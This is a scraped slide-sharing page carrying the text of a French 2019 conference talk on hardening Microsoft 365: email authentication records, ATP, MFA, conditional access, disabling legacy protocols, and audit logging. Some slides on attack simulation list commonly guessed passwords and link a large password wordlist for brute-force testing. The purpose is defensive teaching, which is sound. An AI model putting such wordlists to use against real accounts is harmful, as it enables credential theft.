aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...
aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...Sébastien Paulet
 
aMS Southeast Asia - Security and compliance M365 with labels 16102021
aMS Southeast Asia - Security and compliance M365 with labels 16102021aMS Southeast Asia - Security and compliance M365 with labels 16102021
aMS Southeast Asia - Security and compliance M365 with labels 16102021Sébastien Paulet
 
Teams Nation - Syntex dans Teams
Teams Nation - Syntex dans TeamsTeams Nation - Syntex dans Teams
Teams Nation - Syntex dans TeamsSébastien Paulet
 
Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021
Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021
Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021Sébastien Paulet
 
Cortex -Syntex Digitalize your company info @M365 California 22/01/2020
Cortex -Syntex Digitalize your company info @M365 California 22/01/2020Cortex -Syntex Digitalize your company info @M365 California 22/01/2020
Cortex -Syntex Digitalize your company info @M365 California 22/01/2020Sébastien Paulet
 
Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020
 Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020 Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020
Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020Sébastien Paulet
 
aOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content Services
aOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content ServicesaOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content Services
aOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content ServicesSébastien Paulet
 
M365 Gurgaon 2020 - How to manage sensitive and personal data in M365
M365 Gurgaon 2020 - How to manage sensitive and personal data in M365M365 Gurgaon 2020 - How to manage sensitive and personal data in M365
M365 Gurgaon 2020 - How to manage sensitive and personal data in M365Sébastien Paulet
 
aOS Solidarite NC - Aller plus loin dans teams
aOS Solidarite NC - Aller plus loin dans teamsaOS Solidarite NC - Aller plus loin dans teams
aOS Solidarite NC - Aller plus loin dans teamsSébastien Paulet
 
aOS Solidarite NC - Gouvernance teams
aOS Solidarite NC - Gouvernance teamsaOS Solidarite NC - Gouvernance teams
aOS Solidarite NC - Gouvernance teamsSébastien Paulet
 
aOS solidarite NC - Teams, apres le rush
aOS solidarite NC - Teams, apres le rushaOS solidarite NC - Teams, apres le rush
aOS solidarite NC - Teams, apres le rushSébastien Paulet
 
aOS Solidarite NC M365 Virtual Marathon - O365 par les usages
aOS Solidarite NC M365 Virtual Marathon - O365 par les usagesaOS Solidarite NC M365 Virtual Marathon - O365 par les usages
aOS Solidarite NC M365 Virtual Marathon - O365 par les usagesSébastien Paulet
 
M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...
M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...
M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...Sébastien Paulet
 
Cyber security and microsoft 365 in action
Cyber security and microsoft 365 in actionCyber security and microsoft 365 in action
Cyber security and microsoft 365 in actionSébastien Paulet
 
All about documents in O365 - M365 May 2020
All about documents in O365 - M365 May 2020All about documents in O365 - M365 May 2020
All about documents in O365 - M365 May 2020Sébastien Paulet
 
Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...
Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...
Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...Sébastien Paulet
 
Cybersecurité dans M365 - aOS Noumea 28-02-2020
Cybersecurité dans M365 - aOS Noumea 28-02-2020Cybersecurité dans M365 - aOS Noumea 28-02-2020
Cybersecurité dans M365 - aOS Noumea 28-02-2020Sébastien Paulet
 
MS ignite : les nouveautés autour des content services et projet cortex - aOS...
MS ignite : les nouveautés autour des content services et projet cortex - aOS...MS ignite : les nouveautés autour des content services et projet cortex - aOS...
MS ignite : les nouveautés autour des content services et projet cortex - aOS...Sébastien Paulet
 
Back from MS Ignite 2019 content service projet cortex
Back from MS Ignite 2019 content service projet cortexBack from MS Ignite 2019 content service projet cortex
Back from MS Ignite 2019 content service projet cortexSébastien Paulet
 
aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365
aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365
aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365Sébastien Paulet
 

Plus de Sébastien Paulet (20)

aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...
aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...
aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...
 
aMS Southeast Asia - Security and compliance M365 with labels 16102021
aMS Southeast Asia - Security and compliance M365 with labels 16102021aMS Southeast Asia - Security and compliance M365 with labels 16102021
aMS Southeast Asia - Security and compliance M365 with labels 16102021
 
Teams Nation - Syntex dans Teams
Teams Nation - Syntex dans TeamsTeams Nation - Syntex dans Teams
Teams Nation - Syntex dans Teams
 
Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021
Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021
Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021
 
Cortex -Syntex Digitalize your company info @M365 California 22/01/2020
Cortex -Syntex Digitalize your company info @M365 California 22/01/2020Cortex -Syntex Digitalize your company info @M365 California 22/01/2020
Cortex -Syntex Digitalize your company info @M365 California 22/01/2020
 
Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020
 Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020 Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020
Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020
 
aOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content Services
aOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content ServicesaOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content Services
aOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content Services
 
M365 Gurgaon 2020 - How to manage sensitive and personal data in M365
M365 Gurgaon 2020 - How to manage sensitive and personal data in M365M365 Gurgaon 2020 - How to manage sensitive and personal data in M365
M365 Gurgaon 2020 - How to manage sensitive and personal data in M365
 
aOS Solidarite NC - Aller plus loin dans teams
aOS Solidarite NC - Aller plus loin dans teamsaOS Solidarite NC - Aller plus loin dans teams
aOS Solidarite NC - Aller plus loin dans teams
 
aOS Solidarite NC - Gouvernance teams
aOS Solidarite NC - Gouvernance teamsaOS Solidarite NC - Gouvernance teams
aOS Solidarite NC - Gouvernance teams
 
aOS solidarite NC - Teams, apres le rush
aOS solidarite NC - Teams, apres le rushaOS solidarite NC - Teams, apres le rush
aOS solidarite NC - Teams, apres le rush
 
aOS Solidarite NC M365 Virtual Marathon - O365 par les usages
aOS Solidarite NC M365 Virtual Marathon - O365 par les usagesaOS Solidarite NC M365 Virtual Marathon - O365 par les usages
aOS Solidarite NC M365 Virtual Marathon - O365 par les usages
 
M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...
M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...
M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...
 
Cyber security and microsoft 365 in action
Cyber security and microsoft 365 in actionCyber security and microsoft 365 in action
Cyber security and microsoft 365 in action
 
All about documents in O365 - M365 May 2020
All about documents in O365 - M365 May 2020All about documents in O365 - M365 May 2020
All about documents in O365 - M365 May 2020
 
Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...
Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...
Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...
 
Cybersecurité dans M365 - aOS Noumea 28-02-2020
Cybersecurité dans M365 - aOS Noumea 28-02-2020Cybersecurité dans M365 - aOS Noumea 28-02-2020
Cybersecurité dans M365 - aOS Noumea 28-02-2020
 
MS ignite : les nouveautés autour des content services et projet cortex - aOS...
MS ignite : les nouveautés autour des content services et projet cortex - aOS...MS ignite : les nouveautés autour des content services et projet cortex - aOS...
MS ignite : les nouveautés autour des content services et projet cortex - aOS...
 
Back from MS Ignite 2019 content service projet cortex
Back from MS Ignite 2019 content service projet cortexBack from MS Ignite 2019 content service projet cortex
Back from MS Ignite 2019 content service projet cortex
 
aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365
aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365
aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365
 

MWCP19 Cybersécurité et M365 en action

  • 1. Guillaume Mathieu Sébastien Paulet Microsoft MVPs Cybersécurité et M365 en action MODERN WORKPLACE CONFERENCE PARIS 2019
  • 2. MWCP 2019 - Thanks to our Sponsors!
  • 3. 3 Enterprise Solutions Architect SPT Conseil @SP_twit Blog sppublish.wordpress.com Directeur Technique Flexsi Blog http://msreport.free.fr Guillaume Mathieu & @SP_twit #MWCP19
  • 5. Microsoft 365 Windows Office 365 EM+S S Guillaume Mathieu & @SP_twit #MWCP19
  • 6. Office 365 S Groups Teams Yammer OneDrive SHAREPOINT EXCHANGE Planner Guillaume Mathieu & @SP_twit #MWCP19
  • 7. S Power Plateform Power BI Power Apps Power Automate Office Pro Plus Word PowerPoint Excel Notes Office 365 (suite) Autres Forms Stream Guillaume Mathieu & @SP_twit #MWCP19
  • 8. Enterprise Mobility + Security G Guillaume Mathieu & @SP_twit #MWCP19 • Azure Active Directory Premium • Azure MFA • Azure Advanced Protection • Microsoft Cloud App Security • Azure Information Protection Premium • Azure Right Management Premium • Intune
  • 12. O365 repose sur Azure S Guillaume Mathieu & @SP_twit #MWCP19 Office 365 (SaaS) Azure (IaaS)
  • 13. Gestion de l’identité – Azure Active Directory S Guillaume Mathieu & @SP_twit #MWCP19
  • 14. Sécurité (Etats-Unis) G Guillaume Mathieu & @SP_twit #MWCP19
  • 15. Sécurité (France) G Guillaume Mathieu & @SP_twit #MWCP19 280 jours : délais pour détecter une attaque 63 jours : délais pour s’en remettre 20 minutes (NotPetya) : 2000 machines, 100 serveurs, sauvegardes HS 81 % : les entreprises Françaises ciblées par une attaque informatique (probablement plus). 35 % : source de l’incident de sécurité, l’équipe IT 800000 euros : prix (moyenne) pour s’en remettre
  • 16. Au programme aujourd’hui G Guillaume Mathieu & @SP_twit #MWCP19 • Arnaque au président • Attaque brute force • Contournement du MFA • Fuite de données • Abus de privilèges • Vol/perte de terminal • Cryptolocker • Suivi • Et Microsoft?
  • 17. 18 Incident #1 Arnaque aux présidents (phishing)
  • 18. Simuler une attaque avec Office 365 Attack Simulator G Guillaume Mathieu & @SP_twit #MWCP19
  • 19. Le cocktail SPF, DMARC, DKIM • SPF -> Origine • vérification IP/domaine envoie du mail (déclaration DNS) • Configuré par défaut si 100% Online v=spf1 include:spf.protection.outlook.com -all • Admin centrale tenant > Configurer > Domaine • Voir https://docs.microsoft.com/fr-fr/microsoft-365/security/office-365- security/set-up-spf-in-office-365-to-help-prevent-spoofing Guillaume Mathieu & @SP_twit #MWCP19S
  • 20. Le cocktail SPF, DMARC, DKIM • DKIM -> Intégrité • signature du mail (clé publique dans le DNS du domaine) Déclarer les CNAME dans Admin tenant > Configurer > Domaines avec pour les noms d’hôte (Ajout CNAME) selector1._domainkey selector2._domainkey Guillaume Mathieu & @SP_twit #MWCP19 #Depuis le Microsoft Exchange Online Powershell module PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module PS > Get-DkimSigningConfig -Identity <custom domain> | fl Selector1CNAME, Selector2CNAME PS > Set-DkimSigningConfig -Identity <custom domain> -Enabled $true S
  • 21. Le cocktail SPF, DMARC, DKIM • DMARC -> Vérification du « Friendly-from » ie MailFrom(5321) = From(5322) • définition du comportement en cas d’échec SPF et DKIM • Déjà géré sur les mails entrants • Pour les mails sortants, modification du DNS (Ajout « TXT »): • Rien faire: _dmarc.<domaine> 3600 IN TXT "v=DMARC1; p=none" • Mise en quarantaine : _dmarc.<domaine> 3600 IN TXT "v=DMARC1; p=quarantine" • Rejet : _dmarc.<domaine> 3600 IN TXT "v=DMARC1; p=reject" S
  • 22. Exchange Online Protection (EOP) • Fonctionnalité inclue dans O365. Add-on pour Exchange On-Premise • Mails entrants: • Filtre • Antivirus • Policies check • Anti Spam • Si ATP, ATP • Delivery S Guillaume Mathieu & @SP_twit #MWCP19
  • 23. Exchange Online Protection (EOP) • Mails sortants: • Antivirus • Policies check • Anti Spam • Score • Delivery S Guillaume Mathieu & @SP_twit #MWCP19
  • 24. Office 365 ATP – Safe Links G Guillaume Mathieu & @SP_twit #MWCP19
  • 25. Office 365 ATP – Safe Links G Guillaume Mathieu & @SP_twit #MWCP19 • Retour d’expérience • Réécriture d’URL → attention aux campagnes marketing de la société ! https://fra01.safelinks.protection.outlook.com/?url=https %3A%2F%2Fleblogosd.wuibaille.fr%2F&data=02%7C01%7 Cmelanie.mathieu%40flexi.msreport.fr%7C7faf54252d0f4 d687ded08d77b04f4b0%7C2e609e7429a14af3b552f9ee8 23c868a%7C1%7C0%7C637113133514350121&sdata=ne XyaMJSEbmWlgB7NaBnyYDspzHJcfnqPg7ezB1h%2B08%3 D&reserved=0 • Possibilité d’interdire URL / autoriser des URL sans inspection • Astuce : faire un clic droit puis Copy link address dans le navigateur • A activer progressivement.
  • 26. SafeLinks dans Teams S Guillaume Mathieu & @SP_twit #MWCP19
  • 27. Anti phishing avec Office 365 ATP • Protection contre l’usurpation de domaine ou mails en particulier • Définition de stratégies Centre de sécurité > Gestion des menaces > Stratégie • Protection d’adresse usurpables (max 60) • Possibilité d’activer du ML (boite intelligente) pour améliorer le filtrage Guillaume Mathieu & @SP_twit #MWCP19S
  • 28. Anti phishing avec Office 365 ATP • Retour d’expérience : • 30 minutes pour s’appliquer • On indique les boîtes aux lettres sensibles dont l'identité peut être usurpée. On ne sélectionne pas les BAL qui doivent être protégées ! • Les boîtes aux lettres sensibles peuvent être internes ou externes. Guillaume Mathieu & @SP_twit #MWCP19G
  • 29. Office 365 ATP – Safe attachments G Guillaume Mathieu & @SP_twit #MWCP19
  • 30. Audit de config ATP avec ORCA • Office 365 Advanced Threat Protection Recommended Configuration Analyzer (ORCA) – Recommandation des devs et experts MS • Voir aussi https://docs.microsoft.com/ en-us/microsoft-365/security/ office-365-security/ recommended-settings-for-eop- and-office365-atp Guillaume Mathieu & @SP_twit #MWCP19 PS > Install-Module -Name ORCA #Dans Pshell avec admin rights PS > Get-ORCAReport #Dans Exchange Online Powershell Module S
  • 31. En résumé • Sans EMS : • SFP, DKIM, DMARC • Filtrage par défaut avec EOP • Possibilité de définir des strategies • Avec EMS • Safe Links • Safe Attachments • Protection domaines et BAL avec ATP Guillaume Mathieu & @SP_twit #MWCP19
  • 33. Attaquer un mot de passe • Password spray • Brute force • Achat de base utilisateurs (62% des utilisateurs réutilisent) • Phishing • Keylog • Mdp écrits • Extorsion S Guillaume Mathieu & @SP_twit #MWCP19
  • 34. Simuler une attaque Spray/Brute Force (O365 E5) • Here are the top 10 we are seeing in guessing attacks on our system: • 123456 • password • 000000 • 1qaz2wsx • a123456 • abc123 • abcd1234 • 1234qwer • qwe123 • 123qwe S Guillaume Mathieu & @SP_twit #MWCP19
  • 35. Simuler une attaque Spray/Brute Force (O365 E5) • Retours d’expériences : • Fichier avec 10 millions de mot de passe : 8,13 Mo https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/C ommon-Credentials/10-million-password-list-top-1000000.txt • La cible doit avoir une boîte aux lettres Office 365 • Hard Return entre les lignes (pas de SHIFT + entrée) • Taille du fichier avec les mots de passe : 10 Mo En pratique, fonctionne uniquement avec un petit nombre de mots de passe. • Lent • Documentation : https://docs.microsoft.com/en-us/microsoft- 365/security/office-365-security/attack-simulator#brute-force-password-attack Guillaume Mathieu & @SP_twit #MWCP19SG
  • 36. Le SSPR (Self Service Password Reset) • Utilisateur In Cloud : • Changement du mot de passe Azure AD uniquement. • Licence Office 365 ou Azure Free. • Changement du mot de passe via My Account https://account.activedirectory .windowsazure.com/ChangePa ssword.aspx S Guillaume Mathieu & @SP_twit #MWCP19G
  • 37. Le SSPR (Self Service Password Reset) • Utilisateur synchronisé : • Licence Azure AD Premium P1 requise • Définir son profil SSPR : http://aka.ms/ssprsetup • Réinitialisation du mot de passe : http://aka.ms/sspr ou My Account (https://account.activedirectory.windowsazure.com/ChangePassword.aspx) • Durée de vie minimale du mot de passe AD : 0 jour S Guillaume Mathieu & @SP_twit #MWCP19G
  • 38. Le SSPR (Self Service Password Reset) • Utilisateur synchronisé (suite) : • Azure AD Connect configuré pour le Write Back des mots de passe. • Stratégie de mot de passe AD = stratégie de mot de passe Azure AD • Stratégie de mots de passe Azure AD → ignoré pour un compte synchronisé Option à activer au niveau du Tenant Azure AD : Set-ADSyncAADCompanyFeature -ForcePasswordResetOnLogonFeature $True -ConnectorName msreportacademy.onmicrosoft.com -AAD • Option Azure AD Connect : activer synchroniser « Password must be changed at next logon » Set-MsolDirSyncFeature -Feature EnforceCloudPasswordPolicyForPasswordSyncedUsers S Guillaume Mathieu & @SP_twit #MWCP19G
  • 39. Azure AD Password Protection S Guillaume Mathieu & @SP_twit #MWCP19G
  • 40. Azure AD Password Protection • Déploiement • https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto- password-ban-bad-on-premises-deploy • Agent à déployer sur tous les contrôleurs de domaine (Passfit.dll) • Les DC n’ont pas besoin d’avoir un accès Internet. • Retours d’expériences : • Licences Azure AD Premium P1, P2 sauf pour les comptes Cloud Only sans liste de mot de passe interdit. • Maximum 1000 mots de passe interdits personnalisés. L’outil prend en charge les variantes de mots de passe. • Liste de mots de passe interdits = liste globale générée via Azure AD Identity Protection + liste personnalisée. • Incompatible avec l’agent Azure AD Application Proxy. S Guillaume Mathieu & @SP_twit #MWCP19G
  • 41. Azure AD Password Protection S Guillaume Mathieu & @SP_twit #MWCP19G
  • 42. Preview : l’utilisateur vérifie lui-même ses données de connexion Guillaume Mathieu & @SP_twit #MWCP19 Via le portail : https://mysignins.microsoft.com ou https://myprofile.microsoft.com/ S
  • 43. Preview : l’utilisateur vérifie lui-même ses données de connexion Guillaume Mathieu & @SP_twit #MWCP19 Via le portail Azure AD (https://portal.azure.com) dans le contexte d’un compte standard S
  • 44. AD Smart Lock / IP Smart Lock • Si AD : Fonctionne uniquement si les Hash sont synchronisés dans le Cloud • Par défaut: verrouillage de 60 secondes après 10 tentatives KO • Activation par https://aad.portal.azure.com/ > Sécurité S Guillaume Mathieu & @SP_twit #MWCP19
  • 45. AD Smart Lock / IP Smart Lock • Retours d’expériences : • Même problématique que le verrouillage des comptes AD. • Peut être détourné pour faire une attaque de type dénie de service si les seuils de verrouillage de comptes sont trop bas ou si la durée de verrouillage est trop importante. Guillaume Mathieu & @SP_twit #MWCP19G
  • 46. MFA « simple » • Inclus avec Office 365 • Configurer le cache de session / méthode d’authentification. • Conditionnal Access avec ADFS : Skip multi-factor authentication for requests from federated Users • Garder un compte admin sans MFA (Glass breaker) avec mot de passe aléatoire de 20 caractères minimum. S Guillaume Mathieu & @SP_twit #MWCP19G
  • 47. #General : PowerShell sur Microsoft 365 Guillaume Mathieu & @SP_twit #MWCP19 #Ajout de la PowerSehll Gallery en zone de confiance PS > Set-PSRepository -Name PSGallery -InstallationPolicy Trusted PS > Install-Module MSOnline #O365 PS > Install-Module AzureAD –Repository PSGallery #Azure AD PS > Install-Module Microsoft.Online.SharePoint.PowerShell #SharePoint PS > Install-Module MicrosoftTeams #Teams S • Retour d’expériences : • 1 module PowerShell pour tous les services Office 365. • 2 modules PowerShell pour Azure : MsOnline et AzureAD. Les 2 sont complémentaires. • Nouveau module PowerShell pour Exchange (pour authentification moderne / MFA). G
  • 48. #General : Powershell sur Microsoft 365 • Installer le module PowerShell Exchange Online V1 (solution 1) : • Utiliser le lien depuis Exchange Online Admin Center | hybrid. Utiliser Internet Explorer comme navigateur pour le téléchargement ! Guillaume Mathieu & @SP_twit #MWCP19 PS > Connect-EXOPSSession #Connexion Exchange Online PS > Connect-IPPSSession #Connexion centre de Sécurité et Conformité S
  • 49. #General : PowerShell sur Microsoft 365 • Installer le module Exchange Online V2 (solution 2) : • Suivre la procédure Microsoft : https://docs.microsoft.com/en-us/powershell/exchange/exchange- online/exchange-online-powershell-v2/exchange-online-powershell- v2?view=exchange-ps Fermer PowerShell après installation forcée de PowerShellGet. Guillaume Mathieu & @SP_twit #MWCP19 PS > Install-Module PowershellGet -Force #Installation POwerShell Get PS > Set-ExecutionPolicy RemoteSigned PS > Install-Module -Name ExchangeOnlineManagement #Installation du module Exchange V2 PS > Connect-ExchangeOnline #Connexion Exchange Online S
  • 50. Activation ADAL • Activé par défaut uniquement sur les tenants récents. • Prérequis pour le MFA avec les clients lourd (Outlook, Word, Excel…) • Plus besoin de ressaisir le mot de passe dans Outlook en mode fédéré (ADFS…). • Prérequis pour désactiver les anciens (Legacy) protocoles d’authentification Exchange Online. Guillaume Mathieu & @SP_twit #MWCP19S PS > Connect-EXOPSSession #Exchange Online Powershell module PS > Set-OrganizationConfig -OAuth2ClientProfileEnabled $true #30 minutes to apply PS > Get-OrganizationConfig | Format-Table Name,OAuth* -Auto #Vérification
  • 51. Désactivation des protocoles « Legacy » S Guillaume Mathieu & @SP_twit #MWCP19 Microsoft désactivera les protocoles d’authentification basiques (sauf SMTP) dés Octobre 2020 Protocol / service Paramètre (pour les Policies) Exchange Active Sync (EAS) AllowBasicAuthActiveSync Autodiscover AllowBasicAuthAutodiscover IMAP4 AllowBasicAuthImap MAPI over HTTP (MAPI/HTTP) AllowBasicAuthMapi Offline Address Book (OAB) AllowBasicAuthOfflineAddressBook Outlook Service AllowBasicAuthOutlookService POP3 AllowBasicAuthPop Reporting Web Services AllowBasicAuthReportingWebServices Outlook Anywhere (RPC over HTTP) AllowBasicAuthRpc Authenticated SMTP AllowBasicAuthSmtp Exchange Web Services (EWS) AllowBasicAuthWebServices PowerShell AllowBasicAuthPowerShell
  • 52. Désactivation des protocoles « Legacy » S Guillaume Mathieu & @SP_twit #MWCP19 • Désactivation avec PowerShell : PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module PS > Set-CASMailbox -Identity mwcpdemo01@contoso.com -ImapEnabled $false -PopEnabled $false - ActiveSyncEnabled $false
  • 53. Désactivation des protocoles « legacy » S Guillaume Mathieu & @SP_twit #MWCP19 • Désactivation par stratégie PS > New-AuthenticationPolicy –Name "Strict no basic auth" #enable ADAL before! PS > New-AuthenticationPolicy -Name "Allow Outlook Desktop" -AllowBasicAuthImap - AllowBasicAuthWebServices #if I need to run Outlook without Modern Auth PS > Set-User -Identity mwcpdemo01@contoso.com -AuthenticationPolicy "Strict no basic auth“ #Apply at user level (for test and exceptions) PS > Set-User -Identity mwcpdemo01@contoso.com -STSRefreshTokensValidFrom $([System.DateTime]::UtcNow) #force to apply policy under 30 minutes (/24 hours) PS > Set-User -Identity mwcpdemo01@contoso.com -AuthenticationPolicy $null #Clear user policy PS > Set-OrganizationConfig -DefaultAuthenticationPolicy "Strict no basic auth" #Apply at org level
  • 54. Désactivation des protocoles « legacy » S Guillaume Mathieu & @SP_twit #MWCP19 • Désactivation par accès conditionnel : • Nécessite Aure AD Premium P1
  • 55. Désactivation des protocoles « legacy » S Guillaume Mathieu & @SP_twit #MWCP19 • Désactivation par stratégie d’accès conditionnel : • Nécessite Aure AD Premium P1 • Azure AD > Accès conditionnel > Stratégie > Baseline policy: End User protection • S’applique à tout le Tenant -> pour les environnements complexes, utiliser une stratégie personnalisée !
  • 56. Activation des logs Exchange Online • Activé par défaut • Nécessite O365 E5 pour voir l’audit depuis le centre de sécurité et conformité https://protection.office.com/unifiedauditlog S Guillaume Mathieu & @SP_twit #MWCP19 PS > Connect-EXOPSSession #Exchange Online Powershell module PS > Get-OrganizationConfig | Format-List AuditDisabled #False is OK
  • 57. Activation des logs O365 • Désactivé par défaut • Centre Sécurité et Conformité > Rechercher > Rechercher dans le journal d’audit • Conservation 90 jours • Extension à 365 jours à venir 12/2019 pour comptes E5 (#56794) S Guillaume Mathieu & @SP_twit #MWCP19 PS > Connect-EXOPSSession #Exchange Online Powershell module PS > Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $true
  • 58. MFA selon règle d’accès conditionnel • Réduire le nombre de demandes MFA. • Licences Azure AD Premium P1 ou Azure AD Premium P2 (pour Sign Risk) • Assignations à des utilisateurs, groupes, rôles (Preview) • Définition de conditions et de règles d’accès. G
  • 59. MFA selon règle d’accès conditionnel • Retours d’expérience : • Désactiver le MFA pour tous les utilisateurs au niveau d’Azure MFA → conflit avec les règles d’accès conditionnels dans le cas contraire. Attack Simulator : créer un compte dédié pour cette action car Azure MFA doit être activé ! • Condition Sign Risks → s’appuie sur Azure AD Identity Protection. • Impacts potentiels si utilisation des règles par défaut (pas de ciblage). • Scénarios à privilégier / implémenter : • MFA uniquement pour les machines non gérées (licence Azure AD P1) Nécessite de configurer les machines Windows en mode Hybride Join. • MFA sur détection de risques (licences Azure AD P2) G Guillaume Mathieu & @SP_twit #MWCP19
  • 60. MFA pour les machines non gérées • Les types de périphériques Azure AD : • Azure registred (workplace join) • Azure AD Join : machine jointe à Azure Active Directory • AD Domain Join : machine jointe à un domaine Active Directory • Hybrid Join : machine jointe à un domaine Active Directory avec synchronisation du compte ordinateur sous forme d’un MSolDevice. Nécessite une configuration spécifique d’Azure AD Connect. G
  • 61. MFA pour les machines non gérées G • Configuration de la machine : • Une machine ne peut pas être à la fois Azure AD Domain Join et AD join !
  • 62. MFA pour les machines non gérées G • Spécificités machines Azure AD Join : • Pour des donner des permissions à un compte Azure AD : • Impossible via l’interface graphique • Nécessite ICACLS : icacls "C:yourpath" /t /grant azureadFirstLast:M
  • 63. MFA pour les machines non gérées G • Configuration Hybride Join via Azure AD Connect
  • 64. MFA en cas de détection de risque • Retour d’expériences : • Licences Azure AD Premium P2 requise. • S’appuie sur Azure AD Identity Protection. • Simulation : utilisation de Tor Browser avec le compte melanie.bertrand@flexi.msreport.fr G
  • 65. Azure AD comme IDP • Objectifs • Provisionner automatiquement les applications SaaS. • Réduire le nombre de login / mot de passe. Azure AD va jouer le rôle d’IDP (comme ADFS, Ping Federate). • Quelques définitions : • IdP : Identity Provider (l’Azure AD IDP) • SP : Service Provider (le service pour lequel l’utilisateur veut se connecter) • SCIM (System for Cross Domain Identity Management) : permet de créer, modifier et supprimer les identités des applications SaaS. • SAML (Security assertion markup language) : protocole de fédération d’identité G
  • 66. Azure AD comme IDP : exemple avec ServiceNow G
  • 67. En résumé • Activer la librairie ADAL pour Exchange Online / SharePoint Online et bloquer les anciens protocoles (POP, IMAP…) • Sans EMS • Mots de passe complexes et MFA (accès conditionnel basique si ADFS). • Analyse de logs Exchange et O365 • Réduire le nombre de logins / mots de passe (Azure AD comme IDP). Maximum 10 applications au niveau du Tenant Azure AD / Office 365 • Avec EMS • SSPR • MFA selon emplacement géographique, applications, risques, machine gérée ou non. • Liste personnalisée de mots de passe interdits. • Azure Identity protection protège contre les attaques. • Réduire le nombre de logins / mots de passe (Azure AD comme IDP) Pas de limite dans le nombre d’applications. Guillaume Mathieu & @SP_twit #MWCP19
  • 69. Channel jacking S Guillaume Mathieu & @SP_twit #MWCP19
  • 70. Demandez lui … S Guillaume Mathieu & @SP_twit #MWCP19 Jack Dorsey, CEO Twitter. Piraté par SIM SWAP en Aout 2019
  • 71. L’attaque Man In The Middle sur MFA S Guillaume Mathieu & @SP_twit #MWCP19 Utilisateur 4 2FA
  • 72. Exemple de MITM MFA : EvilGinx S Guillaume Mathieu & @SP_twit #MWCP19
  • 73. Filtrer les pays Guillaume Mathieu & @SP_twit #MWCP19S
  • 74. Le PasswordLess G • Quelques protocoles à connaître : • OATH (Initiative for Open Authentication) : groupe de collaboration international qui vise à promouvoir l’authentification forte en open- source. • OTP : One Time Password • TOTP : Time based One Time Password Google Authenticator et Microsoft Authenticatior utilisent le protocole TOTP • FIDO 2 (Fast Identity Online) : Basé sur les protocoles Client to Authenticator Protocol (CTAP) et W3C WebAuthn.
  • 75. PasswordLess avec Authenticator (preview) • Activation dans Azure AD S Guillaume Mathieu & @SP_twit #MWCP19
  • 76. PasswordLess avec Authenticator • Coté utilisateur, aller sur https://aka.ms/mysecurityinfo pour paramétrer Authenticator (nécessite l’enregistrement du téléphone) • Ne résout pas les attaques MitM S Guillaume Mathieu & @SP_twit #MWCP19
  • 77. Démo : PasswordLess clés FIDO2 (Yubikey) Guillaume Mathieu & @SP_twit #MWCP19G
  • 78. Authentification par SMS • Pour les « ForstLine Workers », possibilité d’authentification sans mot de passe, directement par envoie de SMS S Guillaume Mathieu & @SP_twit #MWCP19
  • 79. En résumé • MFA n’est pas 100% sûr • Tenir les antivirus à jour pour éviter les movement latéraux • Avec EMS • Bloquer le phishing initial avec Office 365 ATP • Filtrer les pays si possible • Passwordless en 2020 Guillaume Mathieu & @SP_twit #MWCP19
  • 80. 84 Incident #4 Fuite de données (utilisateur ou vol)
